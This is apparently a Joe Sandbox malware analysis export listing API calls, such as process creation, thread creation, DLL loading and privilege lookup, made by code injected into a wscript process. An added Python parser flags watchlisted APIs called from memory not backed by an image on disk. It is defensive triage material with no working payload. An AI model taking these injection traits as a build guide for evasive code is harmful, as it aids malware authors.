• LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02A0AD62
Memory Dump Source
• Source File: 00000008.00000002.4585739140.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_2a00000_wscript.jbxd
Yara matches
Similarity
• API ID: Load
• String ID:
• API String ID: 2234796835-0
• Opcode ID: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
• Instruction ID: d8af500083ecab089230966dbbde17503c719f2e01fddf9d3af7a74bdc4a3304
• Opcode Fuzzy Hash: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
• Instruction Fuzzy Hash: 3D011EB5D4020DBBDF10EBA4ED81F9DB7799B54318F0045A5AA0997281FA31EB14CB91

APIs
• LookupPrivilegeValueW.ADVAPI32(00000000,?,02A0F1D2,02A0F1D2,?,00000000,?,?), ref: 02A1A7D0
Memory Dump Source
• Source File: 00000008.00000002.4585739140.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_2a00000_wscript.jbxd
Yara matches
Similarity
• API ID: LookupPrivilegeValue
• String ID:
• API String ID: 3899507212-0
• Opcode ID: 3cbd036db815f1a6f831822f4f400f7b7e145f9e35e5d4bf65d90379d78bfa16
• Instruction ID: ccfec40cda3c2bc87b335fcd0d4ae402c6e984412d19a1da729fc25fc9993fb5
• Opcode Fuzzy Hash: 3cbd036db815f1a6f831822f4f400f7b7e145f9e35e5d4bf65d90379d78bfa16
• Instruction Fuzzy Hash: D901ADF6210208ABDB14EF58DC80DEB73ADEF88324F018459F90957202CA30E915CAB5

APIs
• CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02A1A704
Memory Dump Source
• Source File: 00000008.00000002.4585739140.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_2a00000_wscript.jbxd
Yara matches
Similarity
• API ID: CreateInternalProcess
• String ID:
• API String ID: 2186235152-0
• Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
• Instruction ID: 01072a70c8e6071c45f56c2d96cbd7219d5706d5ee6895d0fe177b5bc151aea8
• Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
• Instruction Fuzzy Hash: 9901B2B2211108BFCB58DF89DC80EEB77ADAF8C754F158258FA0D97241C630E851CBA4

APIs
• CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02A0F050,?,?,00000000), ref: 02A191BC
Memory Dump Source
• Source File: 00000008.00000002.4585739140.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_2a00000_wscript.jbxd
Yara matches
Similarity
• API ID: CreateThread
• String ID:
• API String ID: 2422867632-0
• Opcode ID: 3ca6a205792d7ef5e9bf1524afc8b1dc678e378c6025c1e3997efacd26045c0b
• Instruction ID: 3e00dca6d65e1f296e50fe66dd9d656ca184077a337c406b1970f1fd55558565
• Opcode Fuzzy Hash: 3ca6a205792d7ef5e9bf1524afc8b1dc678e378c6025c1e3997efacd26045c0b
• Instruction Fuzzy Hash: EFE065773803043AE72066A9AC02FA7B29D8B81B70F14002AFA0DEA2C0D995F84146A8

APIs
• CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02A0F050,?,?,00000000), ref: 02A191BC
Memory Dump Source
• Source File: 00000008.00000002.4585739140.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_2a00000_wscript.jbxd
Yara matches
Similarity
• API ID: CreateThread
• String ID:
• API String ID: 2422867632-0
• Opcode ID: 7d55885de893406a9c509f9c0cc846aa32c5beb93765153f0fb1aa7fc83bd92f
• Instruction ID: 1eefe9de5dbd4689167969a38adedda9385bd43f6833c2c188930a3fa9962aa9
• Opcode Fuzzy Hash: 7d55885de893406a9c509f9c0cc846aa32c5beb93765153f0fb1aa7fc83bd92f
• Instruction Fuzzy Hash: 34F0927B3C13003AE7306658AD03FA777A98B95B20F15051AFA5DAF2C1DDA4B4418AA9

APIs
• RtlAllocateHeap.NTDLL(02A14536,?,02A14CAF,02A14CAF,?,02A14536,?,?,?,?,?,00000000,00000000,?), ref: 02A1A62D
Memory Dump Source
• Source File: 00000008.00000002.4585739140.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_2a00000_wscript.jbxd
Yara matches
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
• Instruction ID: 4c4884c880b492ad390b963a8afe7fb5b6bab628ab2fcba4309ebbec121c16e8
• Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
• Instruction Fuzzy Hash: 86E04FB1211204ABD714DF59CC40EA777ADEF88764F114559FE085B241C530F911CBF0

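The function records above all follow one fixed text layout (APIs, Strings, Memory Dump Source, Joe Sandbox IDA Plugin, Yara matches, Similarity), repeated once per disassembled function. For triage the fields that matter are the API line (function, module, rendered arguments, reference address), the Memory Dump Source's "based on PE: false" (the code at 02A00000 in the wscript process is not backed by an image on disk), and the Opcode ID, which is what distinguishes two records with an identical API line (the two CreateThread records have different Opcode IDs and are different functions). The Python below is an added example for reducing such an export to a per-process API view; it is not part of the Joe Sandbox report or its tooling. SAMPLE is constructed from three of the records above with the Similarity section shortened, and WATCHLIST is this example's own triage assumption, not a Joe Sandbox signature.

```python
"""Parse Joe Sandbox function records (APIs / Memory Dump Source / Similarity
blocks) and list the APIs reached from memory not backed by a PE image.
Added example, not part of the Joe Sandbox report. SAMPLE is constructed from
three records above (Similarity shortened); WATCHLIST is an assumption here."""
import re
from collections import Counter

API_RE = re.compile(r"^(?P<func>\w+)\.(?P<module>\w+)\((?P<args>.*)\), ref: (?P<ref>[0-9A-Fa-f]+)$")
SRC_RE = re.compile(r"^Source File: (?P<file>\S+), Offset: (?P<offset>[0-9A-Fa-f]+), "
                    r"based on PE: (?P<pe>true|false)$")
SNAP_RE = re.compile(r"^Snapshot File: hcaresult_(?P<pid>\d+)_\d+_[0-9a-f]+_(?P<image>\w+)\.jbxd$")
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Yara matches", "Similarity"}
# Assumed triage list (this example's choice, not a Joe Sandbox signature).
WATCHLIST = {"CreateProcessInternalW", "CreateThread", "LdrLoadDll", "LookupPrivilegeValueW"}

# Constructed from the report's records; bullets as in the export, indentation is stripped by the parser.
SAMPLE = """\
APIs
• RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02A03AF8), ref: 02A1A66D
Strings
Memory Dump Source
• Source File: 00000008.00000002.4585739140.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_2a00000_wscript.jbxd
Yara matches
Similarity
• API ID: FreeHeap
• String ID: .z`
• API String ID: 3298025750-1441809116
• Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
APIs
• PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02A0836A
• PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02A0838B
Memory Dump Source
• Source File: 00000008.00000002.4585739140.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_2a00000_wscript.jbxd
Yara matches
Similarity
• API ID: MessagePostThread
• String ID:
• Opcode ID: 11db2db6729fad1b2fe29d12422f9571aab132b5507ffda246947416a0e543a6
APIs
• CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02A1A704
Memory Dump Source
• Source File: 00000008.00000002.4585739140.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_2a00000_wscript.jbxd
Yara matches
Similarity
• API ID: CreateInternalProcess
• String ID:
• Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
"""


def parse_records(text):
    """Split the export into per-function dicts; every record opens with 'APIs'."""
    records, rec, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip().lstrip("\u2022").strip()    # drop indentation and the bullet
        if not line:
            continue
        if line in SECTIONS:
            if line == "APIs":
                rec = {"apis": [], "strings": [], "yara": [], "similarity": {}}
                records.append(rec)
            section = line
        elif rec is None:
            continue                                    # graph legend before the first record
        elif section == "APIs" and (m := API_RE.match(line)):
            rec["apis"].append({"func": m["func"], "module": m["module"],
                                "args": m["args"].split(","), "ref": int(m["ref"], 16)})
        elif section == "Memory Dump Source" and (m := SRC_RE.match(line)):
            rec.update(source=m["file"], offset=int(m["offset"], 16), pe_backed=m["pe"] == "true")
        elif section == "Joe Sandbox IDA Plugin" and (m := SNAP_RE.match(line)):
            rec.update(pid=int(m["pid"]), image=m["image"])
        elif section == "Strings":
            rec["strings"].append(line)
        elif section == "Yara matches":
            rec["yara"].append(line)
        elif section == "Similarity":
            key, _, value = line.partition(":")         # e.g. "Opcode ID: 540c..." -> key, value
            rec["similarity"][key.strip()] = value.strip()
    return records


def api_histogram(records):
    """Count API references as module!function across all records."""
    return Counter(f"{a['module']}!{a['func']}" for r in records for a in r["apis"])


def flag_records(records):
    """(image, pid, func, ref) for watchlisted APIs called from memory that the
    sandbox could not tie to a PE image on disk ('based on PE: false')."""
    return [(r.get("image"), r.get("pid"), a["func"], a["ref"])
            for r in records if not r.get("pe_backed", True)
            for a in r["apis"] if a["func"] in WATCHLIST]
```

Two caveats when running this over a full export: the argument list is Joe Sandbox's textual rendering (`?` marks a value it could not resolve), and it is split on commas, so a string argument that itself contains a comma would be split too; and records with the same API line but different Opcode IDs are kept as separate functions on purpose, since the Opcode ID, not the API line, identifies the function.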
APIs
• LookupPrivilegeValueW.ADVAPI32(00000000,?,02A0F1D2,02A0F1D2,?,00000000,?,?), ref: 02A1A7D0
Memory Dump Source
• Source File: 00000008.00000002.4585739140.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_2a00000_wscript.jbxd
Yara matches
Similarity
• API ID: LookupPrivilegeValue
• String ID:
• API String ID: 3899507212-0
• Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
• Instruction ID: da41987a4f4b53f4762b4011ead12b43a2a6f191dcc498e2b2bc2aeb149733f2
• Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
• Instruction Fuzzy Hash: 50E01AB12102086BDB14DF49CC84EE737ADAF88660F018155BA0857241C930E811CBF5
APIs
• SetErrorMode.KERNELBASE(00008003,?,02A08D14,?), ref: 02A0F6FB
Memory Dump Source
• Source File: 00000008.00000002.4585739140.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_2a00000_wscript.jbxd
Yara matches
Similarity
• API ID: ErrorMode
• String ID:
• API String ID: 2340568224-0
• Opcode ID: a2d4a72b799ecba535e6209a82b178d001bd83fc2549ccaf7422d872a4b8c7e9
• Instruction ID: ee2128cd1e0e9dd152a08002d14892792849c3c285f8400a7c26e5faa67f2067
• Opcode Fuzzy Hash: a2d4a72b799ecba535e6209a82b178d001bd83fc2549ccaf7422d872a4b8c7e9
• Instruction Fuzzy Hash: 83D05E656903082AE610AAA89C42F6632895B44B14F490064F948EA2C3DD50E0004565
APIs
• LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02A0AD62
Memory Dump Source
• Source File: 00000008.00000002.4585739140.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_2a00000_wscript.jbxd
Yara matches
Similarity
• API ID: Load
• String ID:
• API String ID: 2234796835-0
• Opcode ID: 1ddec9c740a2b2ef97a035f25dfabd68456f20969e05435321587986678711db
• Instruction ID: 6817982aa892f2c1b6b807f051e65ff56b999eb2d1831302aa1594f2ff564385
• Opcode Fuzzy Hash: 1ddec9c740a2b2ef97a035f25dfabd68456f20969e05435321587986678711db
• Instruction Fuzzy Hash: 38B09231E946182BEA74C7D8AC86B2AB754D785716F144285BE2CA62C0E9A2291041E5
APIs
Memory Dump Source
• Source File: 00000008.00000002.4588781862.0000000004A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A60000, based on PE: true
• Associated: 00000008.00000002.4588781862.0000000004B89000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.4588781862.0000000004B8D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.4588781862.0000000004BFE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_4a60000_wscript.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 9298986b293480d18a86dd5210d6560540a842b29dc3be253fd07484b1fce225
• Instruction ID: 8a6f0930558d687ddaf837d0e118da86d119c3b0b450292b88b7ffb4b95be9ac
• Opcode Fuzzy Hash: 9298986b293480d18a86dd5210d6560540a842b29dc3be253fd07484b1fce225
• Instruction Fuzzy Hash: 0DB09B729015C5C5FB11F760460871779006BD0705F56C075D2130741E473CD5D1F175
APIs
• GetUserDefaultLCID.KERNEL32(?,?,00000000), ref: 00595471
• GetLocaleInfoW.KERNEL32(00000000,20000070,00000000,00000002,?,?,00000000), ref: 0059548F
• GetModuleFileNameW.KERNEL32(?,00000104,?,?,00000000), ref: 005954F6
• FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0059551C
• GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000000), ref: 00595535
• LoadStringA.USER32(000003E9,?,00000104), ref: 0059556F
• GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,00000000), ref: 005955A7
• CharNextA.USER32(?,?,?,?,?,00000000), ref: 005955C8
• memcpy.MSVCRT(?,?,?,?,?,?,?,00000000), ref: 00595606
• strcpy_s.MSVCRT ref: 00595620
• LoadLibraryExA.KERNEL32(?,00000000,00000060,?,?,?,?,00000000), ref: 00595635
• LoadLibraryExA.KERNEL32(?,00000000,00000060,?,?,?,?,00000000), ref: 0059564F
• sprintf_s.MSVCRT ref: 00595692
• CharNextA.USER32(?), ref: 005956B6
• memcpy.MSVCRT(?,?,?), ref: 005956F4
• strcpy_s.MSVCRT ref: 0059570E
• LoadLibraryExA.KERNEL32(?,00000000,00000060), ref: 00595721
• LoadLibraryExA.KERNEL32(?,00000000,00000060), ref: 0059573B
• GetUserDefaultLCID.KERNEL32(?,?,?,?,00000000), ref: 0059574B
• GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,?,?,00000000), ref: 00595764
• sprintf_s.MSVCRT ref: 0059578A
• CharNextA.USER32(?), ref: 005957AE
• memcpy.MSVCRT(?,?,?), ref: 005957EC
• strcpy_s.MSVCRT ref: 00595804
• LoadLibraryExA.KERNEL32(?,00000000,00000060), ref: 00595817
• LoadLibraryExA.KERNEL32(?,00000000,00000060), ref: 0059582D
Strings
Memory Dump Source
• Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_580000_wscript.jbxd
Similarity
• API ID: LibraryLoad$CharInfoLocaleNextmemcpystrcpy_s$DefaultFileModuleNameUsersprintf_s$FreeString
• String ID: %s%s.DLL
• API String ID: 2133840635-4110387156
• Opcode ID: 37653d8424be2ae8440e790b3045ceebf3f2fc952c3e384264eca51423ad85e3
• Instruction ID: 5785c2745b7d53692284aab876379ea07ebd09f5962aa90949f06656af4b1123
• Opcode Fuzzy Hash: 37653d8424be2ae8440e790b3045ceebf3f2fc952c3e384264eca51423ad85e3
• Instruction Fuzzy Hash: 21B1D67290061DABDF22DB64CC49BEA7BBDFF19700F050496E509E3141FA359A58DBA0
APIs
• FormatMessageW.KERNEL32(000011FF,00000000,00000000,00000000,h+Y,00000000,00000000,00000104,?,?,00000000,00000000,?,00592B68,?), ref: 0058B55A
• LocalAlloc.KERNEL32(00000000,00000016,?,00592B68,?), ref: 0058B56B
• GetLastError.KERNEL32(?,00592B68,?), ref: 0058B578
• swprintf_s.MSVCRT ref: 0058B59F
• FormatMessageA.KERNEL32(000011FF,00000000,00000000,00000000,?,00000000,00000000,00000104,?,?,00000000,00000000,?,00592B68,?), ref: 0058B5B6
• LocalAlloc.KERNEL32(00000000,0000000B,?,00592B68,?), ref: 0058B5C3
• sprintf_s.MSVCRT ref: 0058B5D9
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,?,00592B68,?), ref: 0058B5EB
• LocalAlloc.KERNEL32(00000000,00000000,?,00592B68,?), ref: 0058B5FC
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,?,00592B68,?), ref: 0058B616
• SysAllocString.OLEAUT32(h+Y), ref: 0058B627
• LocalFree.KERNEL32(00000000,?,00592B68), ref: 0058B638
• LocalFree.KERNEL32(00000000), ref: 0058B647
Strings
Memory Dump Source
• Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_580000_wscript.jbxd
Similarity
• API ID: Local$Alloc$ByteCharFormatFreeMessageMultiWide$ErrorLastStringsprintf_sswprintf_s
• String ID: 0x%8X$0x%8X$h+Y$h+Y
• API String ID: 1583499379-204340514
• Opcode ID: af133197ef827634d1655eb5cab2659cd294ff925931841abcff15321e1b4797
• Instruction ID: e05d0cb4819cd66c8a77036937e7ee56d7aa5376425993bf3570dba15b2f377d
• Opcode Fuzzy Hash: af133197ef827634d1655eb5cab2659cd294ff925931841abcff15321e1b4797
• Instruction Fuzzy Hash: 5631AE31901226FBEB216BAA9C0CEEF7E7CFF55761F15015AB811F1190EB708A04E7A4
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00595846: RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows Script Host\Settings,00000000,00020019,00588FB7,Software\Microsoft\Windows Script Host\Settings,00000000,00000000,80000001,80000001,?,0058BB74,?,00000000,?,00000000), ref: 00595873
                                                                                                                                                                                                                        • Part of subcall function 00595846: WideCharToMultiByte.KERNEL32(00000000,00000000,Software\Microsoft\Windows Script Host\Settings,000000FF,00000000,00000000,00000000,00000000,Software\Microsoft\Windows Script Host\Settings,00000000,00000000,80000001,80000001,?,0058BB74), ref: 0059589D
                                                                                                                                                                                                                        • Part of subcall function 00595846: GetLastError.KERNEL32(?,00000000,00000000,00000000,?,0058BB74,?,00000000,?,00000000,?,?,?,00588FB7,00000000,00000000), ref: 005958AA
                                                                                                                                                                                                                        • Part of subcall function 00595846: __alloca_probe_16.LIBCMT ref: 005958B4
                                                                                                                                                                                                                        • Part of subcall function 00595846: WideCharToMultiByte.KERNEL32(00000000,00000000,Software\Microsoft\Windows Script Host\Settings,000000FF,?,00000000,00000000,00000000,?,0058BB74,?,00000000,?,00000000), ref: 005958C8
                                                                                                                                                                                                                        • Part of subcall function 00595846: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00588FB7,Software\Microsoft\Windows Script Host\Settings,00000000,00000000,80000001,80000001,?,0058BB74,?,00000000,?,00000000), ref: 005958DF
                                                                                                                                                                                                                      • RegisterEventSourceW.ADVAPI32(00000000,Windows Script Host), ref: 0058B9C5
                                                                                                                                                                                                                      • GetUserNameW.ADVAPI32(?,00000100), ref: 0058B9E7
                                                                                                                                                                                                                      • LookupAccountNameW.ADVAPI32(00000000,?,00000000,?,00000000,?,?), ref: 0058BA16
                                                                                                                                                                                                                      • LookupAccountNameW.ADVAPI32(00000000,?,00000000,?,00000000,?,?), ref: 0058BA7E
                                                                                                                                                                                                                      • ReportEventW.ADVAPI32(?,00000008,00000000,00FF03E9,00000000,00000001,00000000,?,00000000), ref: 0058BAE5
                                                                                                                                                                                                                      • DeregisterEventSource.ADVAPI32(?), ref: 0058BAF1
                                                                                                                                                                                                                      • SysFreeString.OLEAUT32(00000000), ref: 0058BB0E
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000,?,Software\Microsoft\Windows Script Host\Settings,00000000,00000000), ref: 0058BB26
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000,?,Software\Microsoft\Windows Script Host\Settings,00000000,00000000), ref: 0058BB3B
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_580000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: EventName$AccountByteCharCloseLookupMultiOpenSourceWide$DeregisterErrorFreeLastRegisterReportStringUser__alloca_probe_16
                                                                                                                                                                                                                      • String ID: LogSecurityFailures$LogSecuritySuccesses$Software\Microsoft\Windows Script Host\Settings$Windows Script Host
                                                                                                                                                                                                                      • API String ID: 1647329903-2261343319
                                                                                                                                                                                                                      • Opcode ID: b4ca729cc1ce21e7714358597f4fd25923be3acb48553d8c17c4a02a7c95ba3b
                                                                                                                                                                                                                      • Instruction ID: 04d2928f9ddbcf2fbdbe813e0868061f8aeb6271755c295bae29884e0557386f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b4ca729cc1ce21e7714358597f4fd25923be3acb48553d8c17c4a02a7c95ba3b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CC613D7194122DABDB24AB64DC8DBEEBBBDFB58300F1001EAE919A2151DB304E85DF50
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • SysAllocString.OLEAUT32(00583AF4), ref: 005891FF
                                                                                                                                                                                                                      • GetVersionExA.KERNEL32(?,00000000,005810C4,00000000), ref: 0058923F
                                                                                                                                                                                                                      • IsTextUnicode.ADVAPI32(?,?,?), ref: 0058926F
                                                                                                                                                                                                                      • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00589345
                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,?,?,?,00000000,00000000,00000000,005810C4,00000000), ref: 00589372
                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,00000000,?,?,?,00000000,00000000,00000000,005810C4,00000000), ref: 0058937C
                                                                                                                                                                                                                      • SysFreeString.OLEAUT32(00000000), ref: 005893EC
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_580000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: String$Alloc$ByteCharErrorFreeLastMultiTextUnicodeVersionWide
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1844124450-0
                                                                                                                                                                                                                      • Opcode ID: 1be4e05359e8eda0ee65d03b6382ea81b936e31f72cf807a24ab2ee944ff5e1e
                                                                                                                                                                                                                      • Instruction ID: 89de89a0ced63f1ce1bbedadaa0cfc2f6bca0e209252443d954d2db15d13ad81
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1be4e05359e8eda0ee65d03b6382ea81b936e31f72cf807a24ab2ee944ff5e1e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7651C375A00329EFDF306F699C49BBA7FA4BF55314F0844A9EC4AB6280DB308D84DB51
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • CoCreateInstance.OLE32(00583B20,00000000,00000001,00583B90,2Y,00592FD0,005810C4,00000000), ref: 0058DFA4
                                                                                                                                                                                                                      • CoCreateInstance.OLE32(00583B30,00000000,00000001,00583B90,2Y), ref: 0058DFB8
                                                                                                                                                                                                                      • GetUserDefaultLCID.KERNEL32 ref: 0058DFCF
                                                                                                                                                                                                                      • CoGetClassObject.OLE32(00583B50,00000001,00000000,0058409C,?), ref: 0058E074
                                                                                                                                                                                                                      • CreateBindCtx.OLE32(00000000,?), ref: 0058E221
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_580000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Create$Instance$BindClassDefaultObjectUser
                                                                                                                                                                                                                      • String ID: WSH$WScript$2Y
                                                                                                                                                                                                                      • API String ID: 1420412123-2458491470
                                                                                                                                                                                                                      • Opcode ID: f51ca5708b82fde601435248973221013988eaa567228c4882cf55638d7dbd46
                                                                                                                                                                                                                      • Instruction ID: 98eb15fb695fda0350e6883bd28e83971e52f18cb5ce5ef1375530660495f1a1
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f51ca5708b82fde601435248973221013988eaa567228c4882cf55638d7dbd46
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DB127074B002059FDB14AF99E896A6D7BB6FF89710F15046DEA02BB3A1CF71AC01CB54
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00597B6E,00581000), ref: 00597A3F
                                                                                                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(n{Y,?,00597B6E,00581000), ref: 00597A48
                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(C0000409,?,00597B6E,00581000), ref: 00597A53
                                                                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000,?,00597B6E,00581000), ref: 00597A5A
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_580000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                                      • String ID: n{Y
                                                                                                                                                                                                                      • API String ID: 3231755760-1668576853
                                                                                                                                                                                                                      • Opcode ID: 9db075fb6f5ac2b325de44082fb03bcd5a4f9e1b8b3bf9e96dbc68380327a3b3
                                                                                                                                                                                                                      • Instruction ID: 29afae3bbb12d1d5f992b1c5925a280b8d2c0c1546ca8cacaeb3c77005f1c09c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9db075fb6f5ac2b325de44082fb03bcd5a4f9e1b8b3bf9e96dbc68380327a3b3
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 00D01236004344FFDB002BE9EC0DA493F28EBD8352F06400AF72E82060CB314419EB61
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 005979CD
                                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 005979DC
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 005979E5
                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 005979EE
                                                                                                                                                                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 00597A03
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_580000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1445889803-0
                                                                                                                                                                                                                      • Opcode ID: db096f3f416c239daeb8de51b0f1d53f33d6a542f127fe922e6062443bcebd00
                                                                                                                                                                                                                      • Instruction ID: 8d99e43482f99f507f43c8563960a87e054a660a63e24501e0111c5571726a4b
